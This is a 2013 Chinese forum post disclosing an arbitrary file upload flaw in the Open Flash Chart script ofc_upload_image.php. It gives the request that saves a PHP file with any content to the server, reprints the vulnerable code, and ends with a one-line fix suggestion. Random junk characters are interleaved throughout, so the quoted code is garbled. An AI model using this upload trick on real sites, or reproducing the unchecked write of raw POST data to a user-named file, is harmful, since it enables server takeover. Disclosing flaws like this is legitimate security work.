POST 数据漏洞文件执行任意后缀文件保存
- m0 q: k+ A8 ^ ` 漏洞文件/chart/php-ofc-library/ofc_upload_image.php
! |4 U( Y9 @& X1 j4 C
9 L& K; s( r! I+ ~& i* O+ k利用:. q8 x& U" Z( T6 R* P
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
4 t# L' \0 ]7 ]' V' J \6 J% W! A
Post任意数据
X+ }# L/ s S( Y D4 C. W保存位置http://localhost/chart/tmp-upload-images/hfy.php
8 s1 ]; |4 O( z* n0 \: U; I& h
+ }* `, \+ _( y) c% A% b l4 |, f# N
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
( W& N; S; _ }2 w# v: V3 s% Q6 W6 D% s- P* u2 ~* K: u( w
<?php
2 g6 {# _4 m( j# i
% a! p" {4 h4 @/ l* Z//
& k1 J; q: ` Q4 Y8 u3 N8 |% S// In Open Flash Chart -> save_image debug mode, you
9 T" t* c% i6 w# ?- _2 S) i// will see the 'echo' text in a new window." _7 W# F2 h6 z9 H( ^! Y
//9 X" G" P" n% h" s1 y
: X; h! x$ Z% d1 W/*' i S; ?$ F2 g9 n( V
0 {+ X* `( m O5 S S5 ]
print_r( $_GET );
/ P& p% h# g1 oprint_r( $_POST );
t3 T& E& q! [7 `print_r( $_FILES );
" C2 s U; k/ `
+ j- I0 Z" o( O# tprint_r( $GLOBALS );. K' `2 x: Z, U! t9 M+ x. m
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] ); f P3 b5 s/ \
' `5 Q/ W% g' _' E! J! i
*/
+ e) a0 G) ~- p// default path for the image to be stored //
N( I' Y9 [1 @ a% g. A$default_path = '../tmp-upload-images/';* T% t) Y- s5 n/ H [
: F2 T% O5 a* C, ^* S+ q- B9 jif (!file_exists($default_path)) mkdir($default_path, 0777, true);+ s1 o# q4 r" w
, x" x$ X, n* m" j
// full path to the saved image including filename //. a r' [# K' \. x
$destination = $default_path . basename( $_GET[ 'name' ] ); 9 y8 ~* @: s0 G# h8 Y- w) a" f0 U
5 v5 K, [2 H1 k: u( t, S8 Techo 'Saving your image to: '. $destination;# m+ r' W$ k o5 u- C
// print_r( $_POST ); l b* j: K1 {
// print_r( $_SERVER );
9 O& n' x0 l e$ q$ N// echo $HTTP_RAW_POST_DATA; {* M) D8 W2 ?
4 r* H0 M, J7 {6 F9 Q6 H& ^//
% h. O2 H% P3 ~. R: { L// POST data is usually string data, but we are passing a RAW .png( E' H. [) o% W
// so PHP is a bit confused and $_POST is empty. But it has saved. y' W9 a* ?' K
// the raw bits into $HTTP_RAW_POST_DATA7 N: |. [8 ^) y6 e- @& j. J9 l
//
# A" \7 P7 X$ ?( V b/ Y) p) o7 r+ C
$jfh = fopen($destination, 'w') or die("can't open file");
8 c) }: M& H; U. |# q) Ofwrite($jfh, $HTTP_RAW_POST_DATA);" l- h8 _% I+ A. O) G+ x
fclose($jfh);. M+ ?' J) K3 f
( I) K1 i1 b( R/ T) R! x//
5 h. Y, R- \% S/ S n0 p// LOOK:$ g# H4 A1 b0 C0 t: e' }
//
9 N2 u9 `5 I+ y$ Y* Jexit();+ k* `9 ?2 @$ g- q
//% l* s+ K, u; m; U( U" j
// PHP5: m- l5 |1 b3 W5 U
//
4 G& e% Y* g" w% v6 i/ O" s: u: z% j1 D- D# \2 l9 Y
4 f7 s8 f4 L6 v, h" U! ~
// default path for the image to be stored //* T1 N _+ H; k2 t3 \ h
$default_path = 'tmp-upload-images/';8 l! h4 g% g' a! F$ A6 i0 d
# z: Y6 f+ h/ T* w
if (!file_exists($default_path)) mkdir($default_path, 0777, true);% F/ H4 X! v9 o v
& C. a1 V4 |; s3 v. ]; h// full path to the saved image including filename //
+ j) [6 l# C8 X7 N- ]$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
+ I, U/ S. e/ ?3 ?9 @. S! y. T2 l( n4 d8 T5 }
// move the image into the specified directory //
, ]) _3 T4 _+ V3 g' W, y' Eif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) { `1 W% u' b' E! a. S
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
8 K! e# {. x+ R8 x' k+ ]} else {/ w/ K7 H, `* u8 T0 a1 ~
echo "FILE UPLOAD FAILED";
7 A$ B0 Z! u- ^7 M}
( P7 x, T( o. q n- V2 {
3 K" \# J1 M7 J: V# D
5 q, h6 N+ A0 R$ z# f1 i?>$ i/ j' J* T2 b' j5 a. ]7 W
- w/ t+ W0 A+ b5 S
8 S/ B' I; m3 o2 Z
( l$ b& [! k9 `7 o- z5 y
' J6 b, Q( I, n( Z$ ~$ }7 H; F2 U' W2 a) b, P* t' t
, F ?! W6 u+ t修复方案:
& m, R! J5 i1 I2 j/ B: O4 j, Y$ f# c这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 , l8 J6 g' K& B3 @' _
2 ], P0 R) I. p8 q4 t
: _& i5 w6 C( p @' A! x" W9 m
" G; L5 E' D+ l6 J: ]$ q7 @6 g/ h0 F$ D. {, [1 o2 J" h
|
发表于 2013-2-23 12:38:58
收藏
支持
反对